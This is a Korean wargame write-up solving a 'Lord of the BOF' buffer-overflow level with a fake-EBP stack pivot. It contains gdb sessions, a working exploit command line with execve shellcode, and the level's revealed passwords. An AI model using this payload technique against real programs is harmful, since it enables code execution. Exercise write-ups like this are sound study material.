[lob] assassin -> zombie_assassin

1. intro

 

2. code 및 분석

2.1.  C code

/*
        The Lord of the BOF : The Fellowship of the BOF
        - zombie_assassin
        - FEBP
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] == '\xbf')
        {
                printf("stack retbayed you!\n");
                exit(0);
        }

        if(argv[1][47] == '\x40')
        {
                printf("library retbayed you, too!!\n");
                exit(0);
        }

        // strncpy instead of strcpy!
        strncpy(buffer, argv[1], 48);
        printf("%s\n", buffer);
}

 

2.2. 분석

이전과 동일하지만 strncpy를 통해 buffer에 복사되는 길이만 다르다.

 

3. 취약점 확인 및 공격 준비

3.1. 취약점

ret address 변조 가능... 이젠 쓰기도 귀찮아지려 하는구먼 ㅋㅋㅋㅋ

다만, ret address 까지만 복사되기 때문에 이제는 ret gadget으로는 해결이 안 된다.

 

3.2. 공격 준비

다시 한번 프로그램이 종료될 때를 생각해보자.

leave 시 ebp를 복구하고, ret에서 eip에 값을 넣은 후 jmp eip를 실행한다.

어셈블러 코드로 보면

leave는

mov ebp, esp
pop ebp

ret은

pop eip
jmp eip

이다.

만일 main 함수 에필로그에서 ebp, 즉 sfp에 특정 값을 넣고 ret address 위치에 leave & ret gadget을 삽입한다면, 다시 한번 ebp가 setting 될테고 해당 주소 이후의 값이 ret address가 될 것이다.

 

그러므로 페이로드를 작성해보면 아래와 같다.

dummy 40 bytes + sfp (actual ret - 4 byte, fake ebp의 주소) 4bytes + ret (leave, ret gadget) 4 bytes
+ dummy (fake ebp) 4 byte + ret (actual ret val's address, fake ebp + 4) 4 byte + actual ret val 4 byte + nop & shellcode

 

가젯부터 구해보면 main의 그것을 쓰면 될 것 같다.

0x80484df <main+159>:   leave
0x80484e0 <main+160>:   ret

 

대략 페이로드를 작성해 실제 주소를 확인해보면 아래와 같다.

(gdb) r `python -c 'print "A"*40 + "BBBB" + "\xdf\x84\x04\x08" + "CCCC" + "DDDD" + "EEEE" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`         Starting program: /home/assassin/zombie_assassia `python -c 'print "A"*40 + "BBBB" + "\xdf\x84\x04\x08" + "CCCC" + "DDDD" + "EEEE" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
/bin/bash2: /home/bugbear/.bashrc: Permission denied
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB߄

Program received signal SIGSEGV, Segmentation fault.
0x80484df in main ()
(gdb) x/40x $esp - 40
....
0xbffffbd8:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffbe8:     0x41414141      0x41414141      0x41414141      0x42424242
0xbffffbf8:     0x080484df      0x43434343      0x44444444      0x45454545
0xbffffc08:     0x90909090      0x90909090      0x90909090      0x90909090

 

4. exploit

위를 토대로 페이로드를 작성해서 시도.

(gdb) r  `python -c 'print "A"*40 + "\xfc\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\x08\xfc\xff\xbf" + "\x0c\xfc\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
Starting program: /home/assassin/zombie_assassia `python -c 'print "A"*40 + "\xfc\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\x08\xfc\xff\xbf" + "\x0c\xfc\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
/bin/bash2: /home/bugbear/.bashrc: Permission denied
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄

Program received signal SIGINT, Interrupt.
0xbffffc0c in ?? ()
(gdb) c
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) c
Continuing.
euid = 515
pushing me away

 

gdb에서는 되는데 실 파일에서는 안된다.

[assassin@localhost assassin]$ ./zombie_assassia `python -c 'print "A"*40 + "\xfc\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\x08\xfc\xff\xbf" + "\x0c\xfc\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄
Segmentation fault (core dumped)

core 파일을 뜯어보자.

[assassin@localhost assassin]$ gdb -c core
...
Program terminated with signal 11, Segmentation fault.
#0  0x90909090 in ?? ()
...
(gdb) x/40x $esp-41
0xbffffbdb:     0x41414141      0x41414141      0x41414141      0xbffffbfc
0xbffffbeb:     0x080484df      0x44444444      0xbffffc08      0xbffffc0c
0xbffffbfb:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc0b:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc1b:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc2b:     0xc289c031      0x6850c189      0x73736170      0x796d2f68
0xbffffc3b:     0x622f682d      0xe3896e69      0x80cd0bb0      0x44575000
0xbffffc4b:     0x6f682f3d      0x612f656d      0x73617373      0x006e6973
0xbffffc5b:     0x4f4d4552      0x4f484554      0x313d5453      0x312e3239
0xbffffc6b:     0x312e3836      0x00312e37      0x54534f48      0x454d414e

이를 토대로 수정 및 재 시도.

[assassin@localhost assassin]$ ./zombie_assassia `python -c 'print "A"*40 + "\xf3\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\xf7\xfb\xff\xbf" + "\xfa\xfb\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄
euid = 515
pushing me away
[assassin@localhost assassin]$ ./zombie_assassin `python -c 'print "A"*40 + "\xf3\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\xf7\xfb\xff\xbf" + "\xfa\xfb\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄
euid = 516
no place to hide